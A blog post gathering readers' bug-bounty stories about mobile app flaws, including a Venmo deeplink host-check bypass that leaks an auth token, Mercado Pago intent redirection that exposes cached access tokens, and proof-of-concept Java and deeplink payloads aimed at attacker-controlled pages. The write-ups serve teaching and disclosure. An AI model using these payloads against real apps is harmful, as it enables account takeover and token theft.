Invites in exchange for stories

On the Mobile AppSec World channel, I have been running giveaways among subscribers. Over the past few weeks, I have already given out invites to OFFZONE 2022, which will be held on August 25-26 in Moscow, and to Mobius, which took place in St. Petersburg.

For the contest, I asked subscribers to send me the most interesting, funny, ridiculous, stupid, or memorable vulnerabilities they have ever found in mobile (and not only mobile) applications.

Since a lot of developers read the channel, I also asked them to send in the most amazing things they have seen in their application security audit reports. After all, all of us pentesters have at some point written something not entirely correct, especially when the report was otherwise empty because we did not find anything (yes, that also happens from time to time).

And here I have collected the coolest stories that were sent to me, so that you can read them and smile along with me (spelling and style are carried over from the authors' messages without changes).

So let’s go!

Story #1 by @artebels

Not exactly mobile, but still. The dumbest bug was in the registration function of one mobile application. The reproduction looked like this:

  1. User A creates a new account using email and password

  2. User B creates a new account using user A’s email and his own password

  3. User B gets into user A’s account

Do you know how they fixed this bug? They added a second factor: a confirmation code sent to the email.
Do you know how that worked out? You could simply delete the parameter with the email code from the POST request!
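To make the bypass concrete, here is a minimal sketch (the endpoint, field names, and the use of OkHttp are my assumptions, not details from the original report) of a registration request that simply omits the second-factor parameter:

import okhttp3.FormBody;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.RequestBody;
import okhttp3.Response;

public class RegistrationBypassSketch {
    public static void main(String[] args) throws Exception {
        OkHttpClient client = new OkHttpClient();

        // Hypothetical field names: user B registers with user A's email
        // and his own password, and the "email_code" parameter is simply
        // left out of the POST body.
        RequestBody body = new FormBody.Builder()
                .add("email", "victim@example.com")
                .add("password", "attacker-chosen-password")
                .build();

        Request request = new Request.Builder()
                .url("https://api.example.com/register") // hypothetical endpoint
                .post(body)
                .build();

        try (Response response = client.newCall(request).execute()) {
            System.out.println(response.code()); // the server accepted it anyway
        }
    }
}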

Story #2 by @impact_l

Pour some tea and make yourself comfortable. I’ll tell you a story about how I found a vulnerability in the PayPal mobile app. Namely, we will talk about their asset com.venmo. One fine morning, as usual, I decided to throw the APK into jadx to look for vulnerabilities.

Looking through the lines of code, one class, then another… Nothing interesting. At this point I was upset and thought about moving on to the next asset, but my eye caught on a WebView class.

Yes, yes, there was an interesting function that automatically assigned an AuthorizationToken when loading a page in a WebView.

Naturally, it was possible to pass a URL directly to this class via the deeplink venmo://webview?url=https://www.google.com/

The only catch was that there was a host check.
“Perhaps it is implemented incorrectly,” I thought aloud.

And the verification code was as follows:

public static boolean isSecureVenmoHostUrl(Uri uri) {
    boolean z = false;
    if (uri == null) {
        return false;
    }
    String host = uri.getHost();
    String scheme = uri.getScheme();
    if (host != null && scheme != null
            && scheme.equalsIgnoreCase(BuildConfig.SCHEME)
            && (host.endsWith(".venmo.com") || host.equals("venmo.com") || host.endsWith("venmo.biz"))) {
        z = true;
    }
    return z;
}

You have 5 seconds to find the error.
5..
4..
That’s right, they forgot to add a dot here: host.endsWith("venmo.biz")
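To make the missing dot concrete, here is a tiny check (mine, not from the app) showing why any attacker-registered domain that merely ends with the string "venmo.biz" slips through, while the dotted version would not:

public class HostCheckDemo {
    public static void main(String[] args) {
        // Missing dot: any domain ending in the string "venmo.biz" passes.
        System.out.println("fakevenmo.biz".endsWith("venmo.biz"));      // true  -> bypass
        // With the dot, only real subdomains of venmo.biz pass.
        System.out.println("fakevenmo.biz".endsWith(".venmo.biz"));     // false
        System.out.println("account.venmo.biz".endsWith(".venmo.biz")); // true
    }
}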

Without thinking twice, I decided to put together a PoC and check:

<a href="venmo://webview?url=https://fakevenmo.biz/theft.html">PoC: Send Intent</a>

The triager arrived and set the report to Triaged. Hooray!
And then changed it to Duplicate, pointing out that they already had a report for this bug: #401940. My indignation knew no bounds. Well, congrats @bagipro, nicely caught!

Naturally, I kept following the application’s updates. And to my delight (of course, because the bounty is $10k), I found that report #401940 was marked as Resolved, but the bug was still in the application!

Quickly sitting down at the keyboard, I started hammering out a report. The triager marked it as a duplicate the next day. How so?
I issued an ultimatum, demanding to be added to the original report, and I was pointed here: #450832. Well, congrats @bagipro, nicely caught (again)!

I tried to challenge the decision that my report was a duplicate, since it had been submitted earlier than #450832. But the triagers were relentless. In the end I resigned myself and gave up on the whole venture.

A year or two later, PayPal finally fixed the app, by shipping an incredible fix:

host.endsWith(".venmo.biz")

That’s right, they added a dot.
“Now PayPal users are safe,” I said out loud, rolling my eyes.

However, they still attach an AuthorizationToken when loading a URL in the WebView. That knowledge was worth remembering.
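To show why that matters, here is a rough reconstruction of the pattern described (my sketch with assumed names, not the actual com.venmo code): whatever URL passes the host check gets loaded in the WebView with the user’s token attached:

import android.app.Activity;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebView;

import java.util.Collections;
import java.util.Map;

public class DeeplinkWebViewActivity extends Activity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        WebView webView = new WebView(this);
        setContentView(webView);

        // venmo://webview?url=... arrives here via the deeplink.
        Uri deeplink = getIntent().getData();
        String target = deeplink == null ? null : deeplink.getQueryParameter("url");
        Uri targetUri = target == null ? null : Uri.parse(target);

        // Any URL that passes the host check is loaded with the session token.
        if (targetUri != null && isAllowedHost(targetUri)) {
            Map<String, String> headers =
                    Collections.singletonMap("Authorization", loadAuthorizationToken());
            webView.loadUrl(targetUri.toString(), headers);
        }
    }

    private boolean isAllowedHost(Uri uri) {
        // Stand-in for the isSecureVenmoHostUrl() check shown earlier.
        String host = uri.getHost();
        return host != null && "https".equalsIgnoreCase(uri.getScheme())
                && (host.equals("venmo.com") || host.endsWith(".venmo.com"));
    }

    private String loadAuthorizationToken() {
        // Stand-in for however the app actually stores the session token.
        return "Bearer <token>";
    }
}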

Two years later, an XSS on a .venmo.com subdomain fell into my tenacious paws.

Without thinking twice, I made a deeplink venmo://webview?url=https://legal.venmo.com/index.php?p=<script>alert()<script>
Having successfully applied that knowledge, I sent a report to PayPal and got a well-deserved reward.

I don’t know if this story is sad or funny. At the very least, it seems a little instructive to me.

P.S. The story is real; all coincidences are not accidental.

Story #3 by @artebels

A mobile and desktop chat could be globally blocked for all users by sending 50k characters into the chat. The problem was in the message handler: instead of splitting the 50k characters into parts, it sent them as one whole packet, which killed the parser. And the next time you opened the application, it didn’t even get as far as the list of incoming messages; it hung and crashed.
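As a rough illustration of the missing piece (the chunk size and names are my assumptions, not the real chat code), the handler needed something like this instead of shipping one giant packet:

import java.util.ArrayList;
import java.util.List;

public class MessageChunker {

    // Assumed protocol limit; the real value depends on the chat backend.
    private static final int MAX_CHUNK_LENGTH = 4096;

    // Split an oversized message into parser-friendly pieces.
    public static List<String> split(String message) {
        List<String> chunks = new ArrayList<>();
        for (int start = 0; start < message.length(); start += MAX_CHUNK_LENGTH) {
            int end = Math.min(message.length(), start + MAX_CHUNK_LENGTH);
            chunks.add(message.substring(start, end));
        }
        return chunks;
    }
}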

Story #4 by @iSavAnna

The dumbest vulnerability I’ve ever seen was in a currency conversion method. The current exchange rate was passed in a parameter along the lines of "currancy_rate". Accordingly, you could buy a dollar for 1 kopeck. Paradoxically, this bug existed in two payment systems and lived in the wild for quite some time.
I sometimes come across a similar thing when everything passed to a method gets written straight into Mongo, and you can get a paid service just by passing a flag.
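A minimal sketch of the anti-pattern (names and the conversion flow are my assumptions): the server does the arithmetic with whatever rate the client sent instead of looking it up itself:

public class CurrencyConversionSketch {

    // Vulnerable: the exchange rate comes straight from the request
    // (the "currancy_rate" parameter), so the client picks its own price.
    public static long toUsdCentsVulnerable(long amountKopecks, double clientSuppliedRate) {
        return Math.round(amountKopecks * clientSuppliedRate);
    }

    // Safer: the rate is resolved server-side from a trusted source.
    public static long toUsdCentsSafe(long amountKopecks, RateProvider rates) {
        return Math.round(amountKopecks * rates.kopeckToUsdCent());
    }

    public interface RateProvider {
        double kopeckToUsdCent();
    }
}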

Story #5 by @impact_l

After thinking for a long time about what “the wildest game” even means, I finally mustered up the courage and chose the right story.

During a penetration test, we sometimes find vulnerabilities of the same type across assets. Most often such findings are reproducible in the same way, have the same origin, and come from the same source code. For example: a site has many fields that can be filled with various data, and next to each field there is a “save” button.
Now imagine that every field is vulnerable to XSS. “Why?” you ask.
Because every field, even if it hits a different endpoint, goes through the same function responsible for sanitizing the parameters, santizeField(input).
As a result, we see in the report (especially in a whitebox penetration test) a great many different URLs, for completely different fields and parameters.
You can’t leave any of them out: what if a different function is wired up to one of the URLs and then it’s gone? Thanks to the pentester for listing everything.
Or here is an example where there is only one XSS, but the domain has a whole lot of CNAMEs.
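A tiny sketch of that situation (the function body is invented for illustration; only the name santizeField comes from the story): dozens of endpoints, one shared and flawed sanitizer, so every field is vulnerable for the same reason:

public class FieldSanitizer {

    // Hypothetical shared sanitizer used by every "save" endpoint.
    // It strips <script> tags only, so payloads such as
    // <img src=x onerror=alert(1)> pass straight through,
    // once for every field that calls it.
    static String santizeField(String input) {
        return input.replaceAll("(?i)</?script[^>]*>", "");
    }
}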

But let’s get back to mobile applications, because this channel is not for web developers. What does a researcher, who has just dragged an APK into the decompiler using advanced drag&drop technology, most want to see as a result?

There is an application called Mercado Pago; it is intended for online payments by users in Latin America.
Payments are important; you need to protect users and their funds. So, in order to improve their AppSec processes, the company decided to launch a bug bounty program. And, well, they put their mobile application in scope.

Let’s take a look together at what it consists of. Open AndroidManifest.xml:

<activity android:name="com.mercadopago.activitiesdetail.activities.NewOperationDetailActivity" android:exported="true">
<activity android:name="com.mercadopago.android.google.connect.core.webview.WebviewActivity" android:exported="true">
<activity android:name="com.mercadopago.withdraw.activities.SecondPassActivity" android:exported="true">
<activity android:name="com.mercadopago.withdraw.activities.WebviewActivity" android:exported="true">
<activity android:name="com.mercadopago.withdraw.activities.AddBankAccountActivity" android:exported="true">
<activity android:name="com.mercadopago.withdraw.activities.SelectBankAccountActivity" android:exported="true">
<activity android:name="com.mercadopago.withdraw.activities.SecondPassActivity" android:exported="true">
...+90

“Unbelievable, am I awake?” This is some kind of game: 100 exported activities! And they all constantly communicate with each other using android.content.Intent?
That can’t be. Probably, once I open the classes, there will just be a Flutter stub inside.

In fact, all the application logic is indeed written in Java (Kotlin).
All these 10 different activities responsible for different WebViews are opened using a deeplink of the form mercadopago://wallet?url=http://google.com
Naturally, I started writing reports to the company about the Incredible Threat to User Information Security, assigning each report a Medium severity level and describing how serious a phishing threat an arbitrary page opened inside a payment application is.
The main thing is to take breaks between reports so they don’t guess that the vulnerabilities are all alike.
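For illustration, a minimal sketch (the attacker page is made up, and the snippet is assumed to run from any installed third-party app) of how such a deeplink is fired to open an arbitrary page inside the payment app:

// Fired from any third-party app (or via an <a href> link in a browser):
Intent phish = new Intent(Intent.ACTION_VIEW,
        Uri.parse("mercadopago://wallet?url=https://attacker.example/fake-login"));
startActivity(phish);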

A week after the first report, and the payout for it, they made an incredible fix for one of the ten WebviewActivities, like this: android:exported="false"
Then, as carefully as possible, I sent one report after another.
“A goldmine! I won’t have to work anymore,” I thought.

But life is not so simple: after a few reports they caught on and immediately fixed several activities at once.
Damn! Okay, I’ll find something else.
Looking through the classes, I found the following code in an exported activity:

Intent intent = (Intent) SelectBankAccountActivity.this.getIntent().getParcelableExtra("select_bank_next_intent_extra");
SelectBankAccountActivity.this.startActivity(intent);
SelectBankAccountActivity.this.finish();

Yes, you are looking at a standard vulnerability where, using a malicious intent, you can reach protected (non-exported) application components. The point is that the application takes an “object” (the nested Intent) out of extras that an attacker can send, and then launches it.

Hooray! Now all that remains is to put together the PoC:

// Build the nested intent that the vulnerable activity will launch for us
Intent next = new Intent("android.intent.action.VIEW");
next.setClassName(????)
//...
// Wrap it in the intent we send to the exported SelectBankAccountActivity
Intent intent = new Intent("android.intent.action.VIEW");
intent.putExtra("select_bank_next_intent_extra", next);
startActivity(intent);

But where do you send a malicious intent on behalf of the application if all its activities are already exported anyway?
Showing incredible resourcefulness, I managed to find an okhttp cache inside the application that stored requests along with an access_token.
Without thinking twice, I finally came up with the contents of the next variable:

// The nested intent points at the attacker's own activity, but it is launched
// by the payment app itself, so the URI permission grant comes from the victim
// and gives the attacker read access to its private content provider.
Intent next = new Intent("android.intent.action.VIEW");
next.setClassName(getPackageName(), "com.myclass.Theft");
next.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
next.setData(Uri.parse("content://com.mercado.wallet.provider/images/okhttp/journal"));
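And, to complete the picture, a sketch (mine, under the same assumptions as the PoC above) of what happens inside the attacker’s com.myclass.Theft activity once the payment app has launched that intent:

// The URI arrives together with a read grant issued by the payment app.
Uri granted = getIntent().getData();
try (InputStream in = getContentResolver().openInputStream(granted)) {
    if (in != null) {
        BufferedReader reader = new BufferedReader(new InputStreamReader(in));
        String line;
        while ((line = reader.readLine()) != null) {
            Log.d("Theft", line); // cached requests, including the access_token
        }
    }
} catch (IOException e) {
    Log.e("Theft", "failed to read granted uri", e);
}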

Setting the severity level to High, I got another well-deserved reward. And you know, there were still a dozen such activities that launched a nested intent.
The developers made the following fix: they removed the launch of the nested intent and set exported="false"
But even by report number 5 for this vulnerability, they still hadn’t disabled the okhttp cache.

Summing up: you need to find the fine line where one vulnerability ends and another begins, in order to fix them properly.
Developers, don’t build your applications this way: don’t take a Parcelable Intent from a third-party application and then launch it. I hope your code will always be safe!
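If that launch-the-next-screen pattern really is needed, here is a hedged sketch of a safer handler (only the extra name comes from the story; the screen names and overall approach are my assumptions): whitelist the destinations and strip any smuggled URI grants before launching:

Intent untrusted = getIntent().getParcelableExtra("select_bank_next_intent_extra");
if (untrusted != null) {
    ComponentName target = untrusted.resolveActivity(getPackageManager());
    // Only allow explicitly whitelisted screens of our own app.
    Set<String> allowedNextScreens = new HashSet<>(Arrays.asList(
            "com.example.app.ui.ConfirmWithdrawActivity")); // assumed screen name
    boolean allowed = target != null
            && getPackageName().equals(target.getPackageName())
            && allowedNextScreens.contains(target.getClassName());
    if (allowed) {
        Intent safe = new Intent(untrusted);
        // Drop any permission grants the caller tried to smuggle in.
        safe.removeFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION
                | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
        startActivity(safe);
    }
}
finish();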

P.S. The story is real; all coincidences are not accidental.

Conclusion

Thanks to everyone who took part in the competition, as well as to everyone who read these stories and marveled along with me. The winners deservedly received their conference tickets.

But the miracles don’t end there: I still have a few free tickets left, and I plan to give those away as well.

Thanks for reading and see you at the conferences!
